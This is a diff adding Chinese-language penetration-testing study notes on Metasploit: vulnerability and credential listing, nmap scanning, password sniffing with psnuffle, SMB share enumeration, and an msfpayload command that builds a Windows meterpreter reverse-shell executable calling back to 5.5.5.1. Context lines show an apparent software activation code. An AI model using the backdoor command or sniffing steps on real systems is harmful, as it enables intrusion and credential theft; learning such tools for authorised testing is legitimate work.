--- a/安全/渗透.md
+++ b/安全/渗透.md
@@ -125,3 +125,46 @@ Activation Code: MPMX-VGRB-9BRV-52NA-DXNE
 jingyu323
 
 msf6  扫描结果
+
+- vulns 显示漏洞
+- use 
+- creds  显示数据库中的所有平局
+
+db_nmap -sV 192.168.99.131  查看开放端口
+
+
+
+使用 auxiliary/sniffer 下的psnuffle 模块进行密码嗅探
+
+
+
+smb_enumshare
+
+
+
+字典路径
+
+/usr/share/metasploit-framework/data/wordlists
+
+#### msfpayload  生成后门
+
+```
+msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
+  msfencode -b '' -t exe -o /var/www/meterpreter.exe
+```
+
+
+
+## 渗透测试
+
+
+
+测试基本流程：
+
+1.  确定目标
+2. 信息收集
+3. 漏洞探测
+4. 漏洞分析
+5. 漏洞利用
+6. 信息整理
+7. 形成报告
